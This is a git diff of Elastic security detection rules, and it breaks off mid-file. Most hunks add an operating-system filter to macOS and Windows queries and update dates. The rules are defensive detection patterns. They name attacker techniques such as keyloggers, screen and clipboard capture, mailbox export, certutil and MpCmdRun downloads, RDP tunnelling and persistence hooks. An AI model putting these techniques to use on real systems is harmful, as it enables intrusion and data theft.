--- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ type = "eql" query = ''' sequence by host.id with maxspan=5s - [process where event.type in ("start", "process_started", "info") and process.name == "com.apple.foundation.UserScriptService"] by process.pid - [process where event.type in ("start", "process_started") and process.name in ("osascript", "python", "tcl", "node", "perl", "ruby", "php", "bash", "csh", "zsh", "sh") and + [process where host.os.type == "macos" and event.type in ("start", "process_started", "info") and process.name == "com.apple.foundation.UserScriptService"] by process.pid + [process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name in ("osascript", "python", "tcl", "node", "perl", "ruby", "php", "bash", "csh", "zsh", "sh") and not process.args : "/Users/*/Library/Application Support/iTerm2/Scripts/AutoLaunch/*.scpt" ] by process.parent.pid ''' diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 417e9de11..f25aef2ea 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -33,8 +33,8 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and - process.name == "defaults" and process.args == "write" and process.args in ("LoginHook", "LogoutHook") and +process where host.os.type == "macos" and event.type == "start" and + process.name == "defaults" and process.args == "write" and process.args : ("LoginHook", "LogoutHook") and not process.args : ( "Support/JAMF/ManagementFrameworkScripts/logouthook.sh", diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index e70735165..48bc130a1 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:"file" and not event.type:"deletion" and +event.category:file and host.os.type:macos and not event.type:"deletion" and file.name:"com.apple.loginwindow.plist" and process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor or backupd or "iMazing Profile Editor" )) diff --git a/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml b/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml index 3b0f2b8fe..d4ad1db2a 100644 --- a/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml +++ b/rules/macos/persistence_modification_sublime_app_plugin_or_script.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type in ("change", "creation") and file.extension : "py" and +file where host.os.type == "macos" and event.type in ("change", "creation") and file.extension : "py" and file.path : ( "/Users/*/Library/Application Support/Sublime Text*/Packages/*.py", diff --git a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml index 1f8c215d3..5c1c6ae3f 100644 --- a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml +++ b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:"file" and not event.type:"deletion" and +event.category:file and host.os.type:macos and not event.type:"deletion" and file.path:(/private/etc/periodic/* or /private/etc/defaults/periodic.conf or /private/etc/periodic.conf) ''' diff --git a/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml b/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml index 5629a2f39..6972af776 100644 --- a/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml +++ b/rules/macos/persistence_screensaver_engine_unexpected_child_process.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -43,7 +43,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.parent.name == "ScreenSaverEngine" +process where host.os.type == "macos" and event.type == "start" and process.parent.name == "ScreenSaverEngine" ''' diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 803351d6d..a38ae8f38 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -40,7 +40,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "macos" and event.type != "deletion" and file.name: "com.apple.screensaver.*.plist" and file.path : ( "/Users/*/Library/Preferences/ByHost/*", diff --git a/rules/macos/persistence_suspicious_calendar_modification.toml b/rules/macos/persistence_suspicious_calendar_modification.toml index 78d519343..ddccd67ae 100644 --- a/rules/macos/persistence_suspicious_calendar_modification.toml +++ b/rules/macos/persistence_suspicious_calendar_modification.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:file and event.action:modification and
+event.category:file and host.os.type:macos and event.action:modification and
 file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and
 process.executable: (* and not
diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml
index 9b8667ddf..c51fa7c4b 100644
--- a/rules/macos/persistence_via_atom_init_file_modification.toml
+++ b/rules/macos/persistence_via_atom_init_file_modification.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:"file" and not event.type:"deletion" and
+event.category:file and host.os.type:macos and not event.type:"deletion" and
 file.path:/Users/*/.atom/init.coffee and not process.name:(Atom or xpcproxy) and not user.name:root
 '''
diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml
index cadcca664..ef8121471 100644
--- a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml
+++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and process.name : "osascript" and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "osascript" and
 process.command_line : "osascript*with administrator privileges"
 '''
diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml
index b6aa94e86..7160b85e2 100644
--- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml
+++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.name:"security_authtrampoline" and
 process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or Python or perl* or php* or ruby or pwsh)
 '''
diff --git a/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml b/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml
index 8de6c64de..029802577 100644
--- a/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml
+++ b/rules/macos/privilege_escalation_exploit_adobe_acrobat_updater.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -39,7 +39,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.parent.name:com.adobe.ARMDC.SMJobBlessHelper and
 user.name:root and
 not process.executable: (/Library/PrivilegedHelperTools/com.adobe.ARMDC.SMJobBlessHelper or
diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml
index 81d5fc0e4..a77ec46a8 100644
--- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml
+++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.name:(dscl or dseditgroup) and
 process.args:(("/Groups/admin" or admin) and ("-a" or "-append"))
 '''
diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml
index 4d8da16c0..1d5ed5594 100644
--- a/rules/macos/privilege_escalation_root_crontab_filemod.toml
+++ b/rules/macos/privilege_escalation_root_crontab_filemod.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:file and not event.type:deletion and
+event.category:file and host.os.type:macos and not event.type:deletion and
 file.path:/private/var/at/tabs/root and not process.executable:/usr/bin/crontab
 '''
diff --git a/rules/windows/lateral_movement_dns_server_overflow.toml b/rules/network/lateral_movement_dns_server_overflow.toml
similarity index 100%
rename from rules/windows/lateral_movement_dns_server_overflow.toml
rename to rules/network/lateral_movement_dns_server_overflow.toml
diff --git a/rules/windows/collection_email_outlook_mailbox_via_com.toml b/rules/windows/collection_email_outlook_mailbox_via_com.toml
index 8cdefbd39..5936ed883 100644
--- a/rules/windows/collection_email_outlook_mailbox_via_com.toml
+++ b/rules/windows/collection_email_outlook_mailbox_via_com.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.4.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.action == "start" and process.name : "OUTLOOK.EXE" and
+process where host.os.type == "windows" and event.action == "start" and process.name : "OUTLOOK.EXE" and
 process.Ext.effective_parent.name != null and
 not process.Ext.effective_parent.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")
 '''
diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml
index 0b190559d..4de8f0f29 100644
--- a/rules/windows/collection_email_powershell_exchange_mailbox.toml
+++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/11"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -75,7 +75,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and
 process.command_line : ("*MailboxExportRequest*", "*-Mailbox*-ContentFilter*")
 '''
diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml
index 01cb1fd6d..4ed68053b 100644
--- a/rules/windows/collection_mailbox_export_winlog.toml
+++ b/rules/windows/collection_mailbox_export_winlog.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/11"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -68,7 +68,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and powershell.file.script_block_text : "New-MailboxExportRequest"
+event.category:process and host.os.type:windows and powershell.file.script_block_text : "New-MailboxExportRequest"
 '''
diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml
index 9a694b23b..25c5cf204 100644
--- a/rules/windows/collection_posh_audio_capture.toml
+++ b/rules/windows/collection_posh_audio_capture.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text : (
 "Get-MicrophoneAudio" or (waveInGetNumDevs and mciSendStringA)
 ) and not user.id : "S-1-5-18"
diff --git a/rules/windows/collection_posh_clipboard_capture.toml b/rules/windows/collection_posh_clipboard_capture.toml
index 07d7de79b..afef1c8bc 100644
--- a/rules/windows/collection_posh_clipboard_capture.toml
+++ b/rules/windows/collection_posh_clipboard_capture.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -85,7 +85,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 (powershell.file.script_block_text : (
 "Windows.Clipboard" or
 "Windows.Forms.Clipboard" or
diff --git a/rules/windows/collection_posh_keylogger.toml b/rules/windows/collection_posh_keylogger.toml
index 5c316e75f..9b4215d97 100644
--- a/rules/windows/collection_posh_keylogger.toml
+++ b/rules/windows/collection_posh_keylogger.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -85,7 +85,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 (
 powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or "Get-Keystrokes") or
 powershell.file.script_block_text : (
diff --git a/rules/windows/collection_posh_mailbox.toml b/rules/windows/collection_posh_mailbox.toml
index 7f6024152..4ec04bb57 100644
--- a/rules/windows/collection_posh_mailbox.toml
+++ b/rules/windows/collection_posh_mailbox.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -86,7 +86,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 (
 powershell.file.script_block_text : (
 "Microsoft.Office.Interop.Outlook" or
diff --git a/rules/windows/collection_posh_screen_grabber.toml b/rules/windows/collection_posh_screen_grabber.toml
index ee0e6e1f4..15393e8c4 100644
--- a/rules/windows/collection_posh_screen_grabber.toml
+++ b/rules/windows/collection_posh_screen_grabber.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -81,7 +81,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text : (
 CopyFromScreen and
 ("System.Drawing.Bitmap" or "Drawing.Bitmap")
diff --git a/rules/windows/collection_winrar_encryption.toml b/rules/windows/collection_winrar_encryption.toml
index 1a5b7fda4..245955fdf 100644
--- a/rules/windows/collection_winrar_encryption.toml
+++ b/rules/windows/collection_winrar_encryption.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -63,7 +63,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 ((process.name:"rar.exe" or process.code_signature.subject_name == "win.rar GmbH" or process.pe.original_file_name == "Command line RAR") and
diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml
index 3ff3efb40..58b39d23a 100644
--- a/rules/windows/command_and_control_certreq_postdata.toml
+++ b/rules/windows/command_and_control_certreq_postdata.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/13"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "CertReq.exe" or process.pe.original_file_name == "CertReq.exe") and process.args : "-Post"
 '''
diff --git a/rules/windows/command_and_control_certutil_network_connection.toml b/rules/windows/command_and_control_certutil_network_connection.toml
index dbb734d06..68c7719f9 100644
--- a/rules/windows/command_and_control_certutil_network_connection.toml
+++ b/rules/windows/command_and_control_certutil_network_connection.toml
@@ -2,7 +2,7 @@ creation_date = "2020/03/19"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -80,8 +80,8 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where process.name : "certutil.exe" and event.type == "start"]
- [network where process.name : "certutil.exe" and
+ [process where host.os.type == "windows" and process.name : "certutil.exe" and event.type == "start"]
+ [network where host.os.type == "windows" and process.name : "certutil.exe" and
 not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24",
diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml
index ddbb7f62d..538a0e037 100644
--- a/rules/windows/command_and_control_common_webservices.toml
+++ b/rules/windows/command_and_control_common_webservices.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -77,7 +77,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-network where network.protocol == "dns" and
+network where host.os.type == "windows" and network.protocol == "dns" and
 process.name != null and user.id not in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and
 /* Add new WebSvc domains here */
 dns.question.name :
diff --git a/rules/windows/command_and_control_dns_tunneling_nslookup.toml b/rules/windows/command_and_control_dns_tunneling_nslookup.toml
index d10a39210..3acfbd999 100644
--- a/rules/windows/command_and_control_dns_tunneling_nslookup.toml
+++ b/rules/windows/command_and_control_dns_tunneling_nslookup.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,7 @@ tags = [
 type = "threshold"
 query = '''
-event.category:process and event.type:start and process.name:nslookup.exe and process.args:(-querytype=* or -qt=* or -q=* or -type=*)
+event.category:process and host.os.type:windows and event.type:start and process.name:nslookup.exe and process.args:(-querytype=* or -qt=* or -q=* or -type=*)
 '''
diff --git a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml
index c8be1c05b..8b5265fa5 100644
--- a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml
+++ b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-network where network.protocol == "dns" and
+network where host.os.type == "windows" and network.protocol == "dns" and
 /* Add new free SSL certificate provider domains here */
 dns.question.name : ("*letsencrypt.org", "*.sslforfree.com", "*.zerossl.com", "*.freessl.org") and
diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml
index 298fccd02..b4ba60b9a 100644
--- a/rules/windows/command_and_control_iexplore_via_com.toml
+++ b/rules/windows/command_and_control_iexplore_via_com.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,10 +27,10 @@ type = "eql"
 query = '''
 sequence by host.id, user.name with maxspan = 5s
- [library where dll.name : "IEProxy.dll" and process.name : ("rundll32.exe", "regsvr32.exe")]
- [process where event.type == "start" and process.parent.name : "iexplore.exe" and process.parent.args : "-Embedding"]
+ [library where host.os.type == "windows" and dll.name : "IEProxy.dll" and process.name : ("rundll32.exe", "regsvr32.exe")]
+ [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "iexplore.exe" and process.parent.args : "-Embedding"]
 /* IE started via COM in normal conditions makes few connections, mainly to Microsoft and OCSP related domains, add FPs here */
- [network where network.protocol == "dns" and process.name : "iexplore.exe" and
+ [network where host.os.type == "windows" and network.protocol == "dns" and process.name : "iexplore.exe" and
 not dns.question.name :
 (
 "*.microsoft.com",
diff --git a/rules/windows/command_and_control_ingress_transfer_bits.toml b/rules/windows/command_and_control_ingress_transfer_bits.toml
index 1aa4bae96..72473be29 100644
--- a/rules/windows/command_and_control_ingress_transfer_bits.toml
+++ b/rules/windows/command_and_control_ingress_transfer_bits.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/13"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.action == "rename" and
+file where host.os.type == "windows" and event.action == "rename" and
 process.name : "svchost.exe" and file.Ext.original.name : "BIT*.tmp" and (file.extension :("exe", "zip", "rar", "bat", "dll", "ps1", "vbs", "wsh", "js", "vbe", "pif", "scr", "cmd", "cpl") or file.Ext.header_bytes : "4d5a*") and
diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml
index 63d9f4112..223897fc8 100644
--- a/rules/windows/command_and_control_port_forwarding_added_registry.toml
+++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -82,7 +82,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where registry.path : (
+registry where host.os.type == "windows" and registry.path : (
 "HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*",
 "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*"
 )
diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml
index 41accac3d..c9924f419 100644
--- a/rules/windows/command_and_control_rdp_tunnel_plink.toml
+++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -73,7 +73,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 /* RDP port and usual SSH tunneling related switches in command line */
 process.args : "*:3389" and
 process.args : ("-L", "-P", "-R", "-pw", "-ssh")
diff --git a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
index 7bc07c622..f97c5d38e 100644
--- a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
+++ b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/03"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -93,7 +93,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "desktopimgdownldr.exe" or process.pe.original_file_name == "desktopimgdownldr.exe") and
 process.args : "/lockscreenurl:http*"
 '''
diff --git a/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml b/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
index 20f984d74..92f392bbe 100644
--- a/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
+++ b/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/03"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -90,7 +90,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "MpCmdRun.exe" or process.pe.original_file_name == "MpCmdRun.exe") and
 process.args : "-DownloadFile" and process.args : "-url" and process.args : "-path"
 '''
diff --git a/rules/windows/command_and_control_remote_file_copy_powershell.toml b/rules/windows/command_and_control_remote_file_copy_powershell.toml
index e42e94a15..9aa6a93bd 100644
--- a/rules/windows/command_and_control_remote_file_copy_powershell.toml
